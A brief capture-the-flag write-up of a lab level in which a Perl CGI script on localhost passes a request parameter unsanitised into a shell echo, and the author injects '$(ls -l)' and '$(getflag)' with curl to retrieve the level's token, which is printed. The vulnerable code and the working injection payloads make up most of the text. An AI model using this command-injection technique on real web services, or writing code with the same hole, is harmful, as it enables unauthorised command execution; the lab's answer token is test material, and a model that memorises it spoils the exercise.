834 B
834 B
When arriving on level04 I notice the file level04.pl.
This script is in perl and presents itself in the form:
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
$y = $_[0];
print `echo $y 2>&1`;
}
We can therefore see that this script retrieves an argument (here x), and displays this argument.
curl -d x="Common will just echo" http://127.0.0.1:4747
Common will just echo
We can therefore display what we want by executing echo. But also a subshell.
curl -d x="\$(ls -l)" http://127.0.0.1:4747
total 4 -r-xr-x---+ 1 flag04 level04 152 Jan 26 13:42 level04.pl
We can therefore execute commands so let us test with getflag.
curl -d x="\$(getflag)" http://127.0.0.1:4747
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap